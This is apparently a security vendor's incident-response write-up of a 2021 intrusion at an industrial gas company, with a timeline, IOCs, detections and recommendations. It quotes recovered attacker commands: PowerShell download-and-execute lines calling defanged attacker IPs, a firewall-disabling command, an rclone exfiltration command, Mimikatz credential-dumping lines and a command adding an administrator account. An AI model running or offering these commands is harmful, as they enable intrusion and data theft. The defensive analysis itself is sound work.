# Catching the White Stork in Flight

**awakesecurity.com/blog/catching-the-white-stork-in-flight/**

## Executive Summary


May 13, 2021


Arista’s Awake Labs team responded to a cybersecurity incident with a campaign that has been active since at least October 2020, which
we are labeling Operation White Stork.
This campaign utilized multiple techniques and tools including Cobalt Strike Beacon, the MetaSploit Framework, Mimikatz,
**SharpSploit and exfiltration using rclone.**
Awake’s analysis showed that the attackers remotely authenticated to the customer’s VPN and externally facing remote desktop gateway
using previously compromised credentials, coming in through Tor exit nodes.
Lateral movement was achieved primarily using Windows Remote Desktop (RDP) and PsExec.
[This investigation demonstrates the importance of monitoring for exfiltration and](https://awakesecurity.com/glossary/data-exfiltration/) [lateral movement as well as hardening external access](https://awakesecurity.com/glossary/lateral-movement/)
points for members of staff and contractors, particularly when many people are working remotely.

**Operation White Stork**

In this post we break down several aspects of this operation, including:

Industries and Geography
Tactics and Techniques
Investigation and Technical Analysis
Indicators of Compromise (IOCs)
Detecting the Techniques

### Industries and Geographies

Awake’s analysis of this event shows that the actor appears to have specifically targeted an organization in the industrial gas sector.

The locations of the attack were isolated to the United States. However, the attackers downloaded an attacker toolset with a Russian name
(sborka5.zip – ‘sborka’ translates from Russian to ‘assembly’ in English) from the Russian site wdfiles[.]ru and exfiltrated data to a server
hosted in Lithuania.

### Tactics and Techniques


-----

e est gat o de t ed se e a tact cs a d tec ques ac oss t e [&C](https://awakesecurity.com/glossary/mitre-attck-framework/) a e o used by t e t eat acto ese a e deta ed
below.

**ATT&CK Tactic** **Techniques**

Initial Access (TA0001) T1133 – External Remote Services
T1078 – Valid Accounts

Execution (TA0002) T1059.001 – PowerShell
T1569.002 – Service Execution

Credential Access (TA0006) T1110 – Brute Force
T1003.001 – OS Credential Dumping: LSASS Memory

Discovery (TA0007) T1087.002 – Account Discovery: Domain Account
T1482 – Domain Trust Discovery
T1083 – File and Directory Discovery
T1046 – Network Service Scanning
T1135 – Network Share Discovery

Lateral Movement (TA0008) T1570 – Lateral Tool Transfer
T1021.001 – Remote Desktop Protocol
T1021.002 – SMB / Windows Admin Shares

Collection (TA0009) T1560.001 – Archive via Utility
T1119 – Automated Collection
T1039 – Data from Network Shared Drive
T1074.001 – Local Data Staging
T1074.002 Remote Data Staging

Exfiltration (TA0010) T1048 – Exfiltration Over Alternative Protocol

### Incident Timeline and Technical Analysis

The incident was first detected around 160 days after the initial activity when Mimikatz was detected on an endpoint.

Figure 1: Incident Timeline Summary

In total, the activity from the threat actor continued for more than 170 days before containment. Figure 1 provides a summary of each major
stage of the incident, while additional technical details are described below.

The Awake Labs team’s forensic investigation revealed a timeline that begins with repeated failed attempts to connect to several key endpoints
within the customer environment. These connections, using SMB, occurred from a source IP address within the VPN range. During this time
two Windows Service creation events were observed which indicated malicious PowerShell code had been executed on one of the hosts,


-----

ject g a **ete p ete pay oad** to e o y

Figure 2 shows the content of the Image Path field for the service named ‘gaZtYZWmtJFOorGy’ while Figure 3 shows the decoded,
decompressed code:

Figure 2: Malicious code seen in Windows Service Image Path field

Figure 3: Decoded and decompressed base64 section taken from Figure 2

This second base64 encoded string was decoded and found to contain additional code containing the following command:

```
powershell.exe -nop -c IEX ((new-object net.webclient).downloadstring('hxxp[://]45[.]146[.]164[.]193:8712/awq'))

```

This file was no longer present when the incident response team tried to retrieve it.

Additional analysis of the code showed thread injection into C:\Windows\System32\ntvdm.exe.

The code in the Image Path of the second Windows Service event referenced previously was very similar, and had the Service name:
‘vrzvySWAmvRsgZCh’.

The attacker then logged into the same system via RDP, using an administrative account, with the source IP again coming from the VPN pool.
Minutes after this connection, a zip archive named sborka5.zip was downloaded from hxxps[://]wdfiles[.]ru. This archive contained many
tools, such as those typically used for reconnaissance activity and lateral movement (Mimikatz, AdFind, NetScan, PsExec) as well as exploit
tools such as those related to Eternal Blue. Interestingly, ‘sborka’ in Russian translates to ‘assembly’ in English. Not all of these tools were
used by the attackers, but it was noteworthy to see them all hosted together in one place.

Following this, the execution of Mimikatz was logged and the file sek.log was created. This file was recovered and found to be a dump of
credentials, created using Mimikatz.

Shortly after this, a different administrative account was used to log in to the same system via RDP, once again originating from an IP address
in the VPN range. The attacker then used RDP to move laterally, and once again a zip archive named ‘sborka5.zip’ was downloaded from the
same domain as earlier. This was followed by the execution of adfind.bat (see Figure 4) and netscanner64.exe, from within that toolset.


-----

Figure 4: Screenshot of the contents of adfind.bat

As you can see, such information can give the threat actor a lot of information about the domain infrastructure. Each of the output files
referenced in Figure 4, other than ad.7z, were found on the system during the incident response process.

The actor then leveraged an administrative user account to move laterally to a domain controller via RDP and execute adfind.bat and
**netscan64.exe and then disconnected their session.**

The threat actor then appeared to lay low for more than a month before leveraging the previous compromised credentials to connect directly to
a domain controller via RDP. Once again the access originated from an IP address within the VPN range. During this session, the file
**lsass.dmp was created in the user’s AppData\Local\Temp\8\ directory. Loading this file into WinDBG confirmed it was a dump of the**
**lsass.exe process:**

Figure 5: WinDBG analysis of the lsass.dmp file indicated this was a dump of the lsass.exe process

There was then no other evidence of attacker activity for almost two months until logon activity towards several key servers and workstations
was observed in the analysed logs. These logons once again originated from IP addresses within the VPN range. The file
**c:\programdata\rundll32.dll was created on several systems. These instances were launched using the rundll32.exe utility with the command**
line:

```
C:\ProgramData\rundll32.dll vvsection

```

The attackers then used PsExec to push and execute this DLL on remote systems. This was found to be a Cobalt Strike binary. Analysis
showed it attempting to connect to the following URLs:

hxxps[://]newodi[.]com:443/wp-includes/temp.ico
hxxps[://]newodi[.]com:443/faq.js?restart=false

This domain resolved to IP address: 23[.]81[.]246[.]123, which, as you will see later, was involved in a clear beaconing pattern.

The attacker continued using RDP to connect to key servers via the VPN and push and execute the Cobalt Strike DLL on multiple systems.

At one point the actor launched the Windows Password Recovery tool and procdump.exe from the c:\perflogs directory. Shortly after this,
the Cobalt Strike instance that had been running on one system spawned an instance of cmd.exe and attempted to map a shared drive with
the command:

```
net use \\<ipaddress>\c$

```

About a week later, analysis showed lateral movement via RDP between systems, and the threat actor used an administrative account to
launch another PowerShell script to pull down a second stage payload:
```
 powershell.exe -nop -w hidden -c "IEX ((new-object
 net.webclient).downloadstring('hxxp[://]194[.]611[.]53[.]10:80/a213'))"

```
Following this, the file csharp-streamer.exe was executed from the same user’s \AppData\Local\Temp\6\ directory. This was found to be a
[version of SharpSploit (a post exploitation library written in C#).](https://github.com/cobbr/SharpSploit)

Following this activity, another malicious PowerShell command (shown below) was executed using a different administrative user account.
Note, the IP address in this command was found to be related to Cobalt Strike activity observed elsewhere during the incident.


-----

```
 powershell.exe -nop -w hidden -c IEX ((new object net.webclient).downloadstring('hxxp[://]89[.]238[.]185[.]28:4151/a'))"

```
**_Investigation Tip:_**

The above PowerShell commands were pulled from the ConsoleHost_history.txt file from the users’
**\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine directories – a useful file to pull as part of any investigation. This file is**
of additional interest if the last modification time of the file lines up with malicious activity. In our case it did, and these were the only
commands in the files.

The file winspool.drv was created in the same user’s AppData\Roaming\WinRAR\Version\ directory. This file was found to be the remote
access tool RMS RAT.

Shortly after this, the same user logged into a remote desktop server via an externally facing gateway, accessible via a web interface, and the
file Desktop.exe was executed. This file was found to be the remote access tool RMS RAT – the compressed parent of the RMS RAT instance
referenced previously.

Following this, the file c:\perflogs\procdump64.exe was created on the system, and shortly after, **[ADRecon was launched by the same user](https://github.com/adrecon/ADRecon)**
via the PowerShell script C:\PerfLogs\obfs.ps1. Minutes later, there were two instances of PowerShell commands launching what appeared
to be Cobalt Strike Beacon, one example is shown in Figure 6:

Figure 6: Obfuscated code found in PowerShell event logs

The base64 decodes and decompresses to reveal the $DoIt function, which is indicative of Beacon, as shown in Figure 7:

Figure 7: Decompressing and decoding the base64 encoded string in Figure 6

The remainder of the code contains shellcode that will be reflectively injected into process memory on the system as shown in Figure 8:


-----

Figure 8: Encoded shellcode that will be reflectively loaded into process memory

This was decoded and analysed and found to be reaching out to pull down hxxp[://]89[.]238[.]185[.]28/Rr5c – a file that was no longer live
when the team attempted to retrieve it. The identified user agent was Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;
**LBBROWSER) (which can also be indicative of Metasploit). The process created and injected code into C:\Windows\system32\ntvdm.exe.**

Shortly after this, attacker tools such as Advanced_IP_Scanner_2.5.3850.exe and Mimikatz were executed from the c:\support directory by
the same user.

Approximately 30 minutes later, a different account was used to access another remote desktop server from the externally facing gateway and
launch a PowerShell script that had exactly the same functionality as those in Figures 7 and 8. Following this, the same user moved laterally to
a domain controller via RDP and created another lsass.dmp file.

Additional Windows Service creation events were also observed on one of the domain controllers which were indicative of Cobalt Strike:

Figure 9: Base64 encoded PowerShell command being launched as a service

The Service name was 9dcbd6f.

Decoding this and analysing the shellcode, the Awake Labs team saw thread injection into C:\Windows\system32\ntvdm.exe. This time,
rather than attempting to call back to a domain, the following named pipe was created: \\.\pipe\win_service_ohm5iYaaNoo7po7koaTi

[Thanks to an excellent write up from CrowdStrike, we can see that this activity indicated the jump psexec_psh Cobalt Strike Beacon](https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/)
command had been used to establish an instance of Beacon remotely on this system.

[In addition, the following Windows Service creation events indicated that Cobalt Strike Beacon had been pushed remotely to the same, plus](https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/)
one other, domain controller seconds later:

**Service name** **Image path**

2a419f7 \\127.0.0.1\ADMIN$\2a419f7.exe

891ae60 \\127.0.0.1\ADMIN$\891ae60.exe

85ac374 \\127.0.0.1\ADMIN$\85ac374.exe

d27ba3a \\127.0.0.1\ADMIN$\d27ba3a.exe

ef8d577 \\127.0.0.1\ADMIN$\ef8d577.exe

These files were not recovered, but thanks to the same CrowdStrike article, we can see that this activity was indicative that the jump psexec
Cobalt Strike Beacon command had been used to establish a Beacon remotely on this system.


-----

t e sa e pe od, t e attac e s used to access c t ca de ces a d o e ate a y, o ce aga a t e **S a pSp o t** as u o
another system, this time using a critical management account with administrative privileges. On the same day, the user executed
**C:\PerfLogs\x64.exe. When analysed, this was found to launch an instance of sethc.exe (Windows ‘Sticky Keys’ accessibility feature) in a**
suspended state, inject code into it, then exit, leaving sethc.exe running as an orphaned process. In addition, we could see that the process
connected to datatransferdc[.]com over IPv6

(2606[:]4700[:]3037[:][:]ac43[:]8ca0).

A few days later, the Cobalt Strike Beacon processes (rundll32.dll) running on several systems started beaconing out to
**23[.]81[.]246[.]123:443, approximately every 31 minutes.**

On one of these systems, a legitimate version of sethc.exe spawned the process dfrgui.exe (Microsoft Disk Defragmentation process), which
made several outbound network connections over the next few days:

**Domain name** **IP address**

telemetry[.]distrib000[.]com 172[.]67[.]193[.]215

stats[.]0293432094823904832048234[.]work 172[.]67[.]223[.]63

ping[.]12093130987381731037123[.]work 104[.]21[.]21[.]133

dash[.]92834298473247204972349234[.]work 172[.]67[.]158[.]54

dns[.]09123312093812039813[.]work 104[.]21[.]79[.]23

telemetry[.]distrib000[.]com 104[.]21[.]76[.]117

stats[.]0293432094823904832048234[.]work 104[.]21[.]25[.]63

Several hours later, the same dfrgui.exe process launched an instance of PowerShell that attempted to pull down another payload from the
known malicious IP address shown below:
```
 C:\Windows\system32\cmd.exe /C powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('
 hxxp[://]89[.]238[.]185[.]28/a'))"""

```
The process made several additional network connections:

**Domain name** **IP address**

datatransferdc[.]com 104[.]21[.]62[.]240

Not resolved 172[.]67[.]140[.]160

Not resolved 172[.]67[.]198[.]213

Not resolved 172[.]67[.]168[.]181

Not resolved 152[.]199[.]19[.]161

Not resolved 52[.]178[.]182[.]73

Not resolved 51[.]144[.]113[.]175

Not resolved 93[.]184[.]220[.]29

Not resolved 89[.]238[.]185[.]28

The final connection listed (89[.]238[.]185[.]28) was to port 50050, indicating this IP address is likely running Cobalt Strike Teamserver
listening on its default port.

During this two day period of activity, the same process made connections to several internal IP addresses over port 3389, indicating further
attempts to use RDP in an attempt to move laterally. For instance, on one of the systems that was connected to in this manner, the team
observed several instances of the following commands:

1. Disable the firewall:

```
netsh advfirewall set allprofiles state off

```

2. Download a malicious second stage payload from 89[.]238[.]185[.]28:


-----

```
 powershell.exe -nop -w hidden -c IEX ((new-object
 net.webclient).downloadstring('hxxp[://]89[.]238[.]185[.]28/a'))"

```
Shortly after this, rclone was invoked via Powershell to begin exfiltrating data on a file share to an SFTP server based in Lithuania:
```
 PowerShell.exe -windowstyle hidden .\rclone copy --filter-from filter-file.txt <SHARE_LOCATION> conf2:
 <VICTIM_NAME> -q --ignore-existing --auto-confirm --multi-thread-streams 16 --transfers 16 -max-age 2y

```
The contents of the rclone configuration file are shown in Figure 10 below:

Figure 10: Rclone SFTP server configuration information

The contents of filter-file.txt are shown in Figure 11 below:

Figure 11: Filter file used to tell rclone which files to upload

A review of the firewall logs showed several gigabytes of data uploaded to the IP address 91[.]103[.]255[.]177 at this time.

The dfrgui.exe process continued to make internal network connections over port 3389, as well as outbound connections to 80[.]153[.]159[.]29
over port 3390, and 45[.]130[.]138[.]81 towards port 50050 indicating this was also likely related to Cobalt Strike.

At this point the Awake Labs team began taking actions to contain the incident and shut off the exfiltration while in process.

After the containment started, the firewall logs showed there were several attempts made to authenticate to the VPN from multiple users;
which eventually proved successful. These connections all came from the same source: Tor exit node IP address 185[.]220[.]100[.]252
(AS205100 F3 Netze e.V. out of Germany.)

During this session, the actor successfully logged on to another server and created several files associated with Mimikatz and Tor, such as
**c:\users\<user>\downloads\mimidrv.zip and c:\users\<user>\desktop\tor.zip.**

Shortly after this, the firewall logs showed the same user authenticated to the VPN from a known Tor exit node: 91[.]218[.]203[.]59. During this
VPN session, several systems were logged into via RDP.

During these sessions, the user installed and ran Tor by creating and launching:

```
C:\Windows\System32\cmd.exe /C C:\Windows\System32\AppLocker\start.bat

```

Which in turn launched:

```
C:\Windows\System32\AppLocker\AppLocker.exe --service install -options -f C:\Windows\System32\AppLocker\torrc

```

Another lsass.dmp file was created in another compromised administrator account’s \appdata\local\temp\ directory. The file 12212.7z was
created at the same time on the same user’s Desktop; neither file was recovered.

Containment and remediation measures were then put fully into place with ongoing monitoring. Since the containment was enacted, we are yet
to see evidence of the threat actor’s return.

### Conclusions and Recommendations

In this instance a threat actor was able to access the network through the VPN, move laterally via Windows Remote Desktop protocol and
PsExec, download a toolset from a Russian file sharing site – which contained a vast array of attacker tools – install some backdoors, and from
there were able to reach their target and begin to exfiltrate data.


-----

Co pa y sta a e o g e ote y o o e t a e e s a esu t, e te a access po ts a e e ed upo o e a d o e o sta to ca y
out their work duties in the same efficient manner as if they were in the office. Awake Labs sees breaches where initial access is achieved
through external access points (such as VPN or Remote Desktop Gateway) frequently. It is vital that measures are put in place to harden
remote endpoints and exposed external infrastructure. Awake recommends the following items are enforced at a minimum:

Multi-Factor Authentication (MFA) for external access to any company resources (VPN, internal services, etc.).
A strong password policy, whereby passwords should meet a required minimum length; should contain a combination of upper and lower
case letters, numbers and special characters; and should be changed regularly.
Regular user education on security and the risks of poor hygiene.
Remain up to date on vulnerability patching and mitigation for externally facing services.
Asset tracking and management of remote devices. Ensure any devices being used for work purposes are identifiable and have
company standard security tools installed, are actively monitored and up to date (anti-virus, EDR, etc.).

Once an external user has authenticated to a VPN, it is important to make sure they can only access systems they need to access for
business purposes. It is also important to only allow access between network segments that is required for business purposes. Ultimately,
[implementing a Zero Trust model is recommended.](https://awakesecurity.com/white-papers/wp-building-your-zero-trust-strategy-with-nist-800-207-and-ndr/)

### Host based IOCs

Contents of sborka5.zip archive file (note some of these are not IOCs per se, but have been kept in for completeness):

**File path** **sha256 hash** **Contents**

ebbs.exe 7f5f447fe870449a8245e7abc19b9f4071095e02813d5f42c622add56da15b8b

etw576sz.exe e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173

PsExec.exe 3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

Scanner.exe a140e9a3ec3f600ef34e221997f93d70bde20b7dabcc72cf0d120e535a9638f7

AdFind/adcsv.pl cb2c9da00ca544cfe3dddfa491cb97a7d6da8e3b00e17c00a78c13c47c0db8b6

AdFind/adfind.bat 014db7075dc15953ade603627b5f990c79ae35c098129a99876705dc3dc20dd3 See Figure 3

AdFind/AdFind.exe c92c158d7c37fea795114fa6491fe5f145ad2f8c08776b18ae79db811e8e36a3


CVE-2019-1388-master/CVE2019-1388-master/CVE-20191388.gif

CVE-2019-1388-master/CVE2019-1388-master/HHUPD.EXE


320af511385a1479ef2ef5e2fbc55ef58f83c1627c33c0d6a029fb54848fd30f

0745633619afd654735ea99f32721e3865d8132917f30e292e3f9273977dc021


eternal/eternalblue.exe e2cc26b8b38fab6799bd834b8284c1b921339f0133a606d1178c39a720d871c3

eternal/commands.txt d60097e359ac0c98034cc2875c00f5d4f32d2c46ec8d420d82dadd8473cb3eb3 _cmd /c net user petr_
_2k3X8X57 /add_

_cmd /c net localgroup_
_administrators petr /add_

lpe/runsysO.cr 6516bbd99089964e121bab9d448cce19a991aeaf4cbfca4fa1bc7a2357d1948c

mimikatz_trunk/kiwi_passwords.yar 966a58176b30c9bd5d4abfee0690e454129296e5522bbcf5f3c9db7fc84e279e

mimikatz_trunk/lsadump.bat 750aa70ef96cdae1d3a7be92a022b1b3522bdf5a1ff777bf9f7c9af39c53cc21 _mimikatz #_
_privilege::debug_

_mimikatz # inject::process_
_lsass.exe sekurlsa.dll_

_mimikatz #_
_@getLogonPasswords_

mimikatz_trunk/mimicom.idl 51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df

mimikatz_trunk/README.md 56e362b25b365ab16793f15c29f5f05ac6a38a4bfc3d2b38b3a1fcc060b12deb


-----

mimikatz_trunk/sekurlsa.bat 80a025a8548b8272ab91b9aabdc1a742dfe0e7cb123f1fb3f0e897f054257348 _@echo off_

_mimikatz privilege::debug_
_sekurlsa::logonPasswords_
_exit > c.txt_

netscan_portable/netscan32.exe 572d88c419c6ae75aeb784ceab327d040cb589903d6285bbffa77338111af14b

netscan_portable/netscan64.exe bb574434925e26514b0daf56b45163e4c32b5fc52a1484854b315f40fd8ff8d2

**Other host based IOCs:**


**Indicator** **Indicator**
**type**

gaZtYZWmtJFOorGy Service
name

vrzvySWAmvRsgZCh Service
name

%comspec% Service
image
path


**Description**

Service name for injecting meterpreter
shellcode – note this is changeable but
provided for reference

Service name for injecting meterpreter
shellcode – note this is changeable but
provided for reference

Indication that a service is launching a
command prompt. Seeing a service Image
Path start with this is suspicious


sborka5.zip Filename Archive containing attacker tools and files

sek.log Filename Mimikatz output

ad_users.txt Filename Output from adfind.exe

ad_computers.txt Filename Output from adfind.exe

ad_ous.txt Filename Output from adfind.exe

ad_subnets.txt Filename Output from adfind.exe

ad_group.txt Filename Output from adfind.exe

ad_trustdmp.txt Filename Output from adfind.exe

ad.7z Filename Archive containing adfind output files

lsass.dmp Filename Dump of lsass.exe process

AppData\Local\Temp\<num>\ File path Staging directory

c:\programdata\rundll32.dll File path Cobalt Strike


82900aea8a8617f0d49e1c036d1bc23cc768e71b746a0ee5d2bf5cbf43841768 Sha256
hash

rundll32.exe C:\ProgramData\rundll32.dll vvsection Command
line
argument


Cobalt Strike (rundll32.dll)

Command line argument to launch Cobalt
Strike DLL


C:\perflogs\ File path Staging directory used by attackers

procdump.exe Filename Tool for dumping process memory

WPR.exe Filename Windows Password Recovery tool


net use \\<ipaddress>\c$ Command
line
argument


Command used by attacker to map shared
drives


csharp-streamer.exe Filename Version of SharpSploit post exploitation tool kit


ad5c06b52b468711f4f1ce1bf6957506b805b07e52c9be331035536672505160 Sha256
hash

cd43f4c2f4590e1993991b5f7c890919cd0bb6b378c222c21a7ce956759c8a94 Sha256
hash


Version of SharpSploit post exploitation tool kit

RMS RAT


-----

6184e4c8915a3924a9a12e26c42cffef35a1d1380a8c0a236ef65df71b20c217 Sha256
hash


RMS RAT


C:\PerfLogs\obfs.ps1 File path PowerShell script used to launch ADRecon

C:\support\ File path Staging directory


Service name with 7, apparently random alphanumeric characters Service
name

\\127.0.0.1\ADMIN$\<7 alphanumeric chars>.exe Service
Image
Path


Indicative of Cobalt Strike, example: 2a419f7

Indicative of Cobalt Strike, example:

\\127.0.0.1\ADMIN$\2a419f7.exe


C:\PerfLogs\x64.exe File path Cobalt Strike


53031ae7cdd8627c57f341934290e96b757b38beab29ce847fc09140e29349ab Sha256
hash


Cobalt Strike


rclone.exe Filename Used to exfiltrate data


fc03b8c51889be55b73a02efe02f59eb2836e63f5f032aa00dd611ff07e76d0c sha256
hash


Sha256 hash of rclone.exe


filter-file.txt Filename Filter file used by rclone

mimidrv.zip Filename Mimikatz

C:\Windows\System32\AppLocker\start.bat File path Batch script used to start Tor

C:\Windows\System32\AppLocker\torrc File path Tor configuration file

12212.7z Filename Archive file – unrecovered

advanced_IP_Scanner_2.5.3850.exe Filename Reconnaissance tool

loader.exe Filename Component of Windows Password Recovery
service

loader64.exe Filename Component of Windows Password Recovery
service

**Network IOCs**


**Indicator** **Indicator**
**type**


**Description**


hxxps[://]wdfiles[.]ru Domain Staged attacker tools

hxxps[://]newodi[.]com Domain Cobalt Strike

hxxps[://]newodi[.]com:443/wp-includes/temp.ico URL Cobalt Strike

hxxps[://]newodi[.]com:443/faq.js?restart=false URL Cobalt Strike

23[.]81[.]246[.]123 IPv4 Cobalt Strike

hxxp[://]194[.]61[.]53[.]10:80/a213 URL Second stage payload

194[.]61[.]53[.]10 IPv4 IP address hosting second stage payload

89[.]238[.]185[.]28 IPv4 IP address associated with second stage payload

hxxp[://]89[.]238[.]185[.]28/a URL Second stage payload

hxxp[://]89[.]238[.]185[.]28:4151/a URL Second stage payload

hxxp[://]89[.]238[.]185[.]28/Rr5c URL Second stage payload


Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;
Trident/5.0; LBBROWSER)


User
agent


Indicative of Metasploit


45[.]146[.]164[.]193 IPv4 IP reached out to by Meterpreter to pull down second stage payload and
inject it into memory

hxxp[://]45[.]146[.]164[.]193:8712/awq URL Second stage payload


-----

\\.\pipe\win_service_ohm5iYaaNoo7po7koaTi Named
pipe


Cobalt Strike


telemetry[.]distrib000[.]com Domain Connected to by malicious instance of dfrgui.exe

stats[.]0293432094823904832048234[.]work Domain Connected to by malicious instance of dfrgui.exe

ping[.]12093130987381731037123[.]work Domain Connected to by malicious instance of dfrgui.exe

dash[.]92834298473247204972349234[.]work Domain Connected to by malicious instance of dfrgui.exe

dns[.]09123312093812039813[.]work Domain Connected to by malicious instance of dfrgui.exe

datatransferdc[.]com Domain Connected to by malicious instance of dfrgui.exe

2606[:]4700[:]3037[:][:]ac43[:]8ca0 IPv6 IPv6 address used by malware to connect to datatransferdc[.]com

172[.]67[.]193[.]215 IPv4 Connected to by malicious instance of dfrgui.exe

172[.]67[.]223[.]63 IPv4 Connected to by malicious instance of dfrgui.exe

104[.]21[.]21[.]133 IPv4 Connected to by malicious instance of dfrgui.exe

172[.]67[.]158[.]54 IPv4 Connected to by malicious instance of dfrgui.exe

104[.]21[.]79[.]23 IPv4 Connected to by malicious instance of dfrgui.exe

104[.]21[.]76[.]117 IPv4 Connected to by malicious instance of dfrgui.exe

104[.]21[.]62[.]240 IPv4 Connected to by malicious instance of dfrgui.exe

172[.]67[.]140[.]160 IPv4 Connected to by malicious instance of dfrgui.exe

172[.]67[.]198[.]213 IPv4 Connected to by malicious instance of dfrgui.exe

172[.]67[.]168[.]181 IPv4 Connected to by malicious instance of dfrgui.exe

52[.]178[.]182[.]73 IPv4 Connected to by malicious instance of dfrgui.exe

51[.]144[.]113[.]175 IPv4 Connected to by malicious instance of dfrgui.exe

50050 Port Default Cobalt Strike TeamServer port

91[.]103[.]255[.]177 IPv4 SFTP server used for exfiltration

80[.]153[.]159[.]29 IPv4 Connected to by malicious instance of dfrgui.exe (resolves to
p50999f1d[.]dip0[.]t-ipconnect[.]de)

45[.]130[.]138[.]81 IPv4 Connected to by malicious instance of dfrgui.exe – connection made
using default Cobalt Strike TeamServer port

**Detecting the Techniques**

**Platform** **Detection**

Carbon Black Cloud The application rclone.exe was detected running
A known virus (Trojan: RMS) was detected
A known virus (PUP: GenericKD) was detected running.
A known virus (Trojan: MS17) was detected.
A known virus (PWS: Mimikatz) was detected.
A known virus (Trojan: Meterpreter) was detected.
Watchlist query: ((process_cmdline:rundll32.dll) OR (process_cmdline:comspec))

Awake Security Platform Lateral Movement: PsExec Like Activity
Lateral Movement and Execution: Remote Command Execution (psexec, cobalt strike, metasploit, others)
Exfiltration: External FTP Upload
Compliance: SSH Upload Direct To IP

**By Kieran Evans and Jason Bevis**

### Subscribe!

If you liked what you just read, subscribe to hear about our threat research and security analysis.


-----

Kieran Evans

Threat Hunting and Incident Response Specialist

[LinkedIn](https://www.linkedin.com/in/kieran-evans-77632427/)


-----